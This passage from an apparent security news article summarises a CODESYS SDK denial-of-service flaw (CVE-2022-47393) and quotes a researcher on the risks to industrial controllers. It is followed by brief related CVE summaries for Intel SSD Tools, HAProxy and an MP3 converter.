*   **CVE-2022-47393** - After successful authentication, specific crafted communication requests can cause the CmpFiletransfer component to dereference addresses provided by the request for internal read access, which can lead to a denial-of-service situation.

"With CODESYS being used by many vendors, one vulnerability may affect many sectors, device types, and verticals, let alone multiple vulnerabilities," Tokarev said.

"Threat actors could launch a DoS attack against a device using a vulnerable version of CODESYS to shut down industrial operations or exploit the RCE vulnerabilities to deploy a backdoor to steal sensitive data, tamper with operations, or force a PLC to operate in a dangerous way."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

15 New CODESYS SDK Flaws Expose OT Environments to Remote Attacks

Buffer overflow in some Intel(R) SSD Tools software before version mdadm-4.2-rc2 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE-2023-28736

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

EZ softmagic MP3 Audio Converter 2.7.3.700 was discovered to contain a buffer overflow.

Tag

#buffer_overflow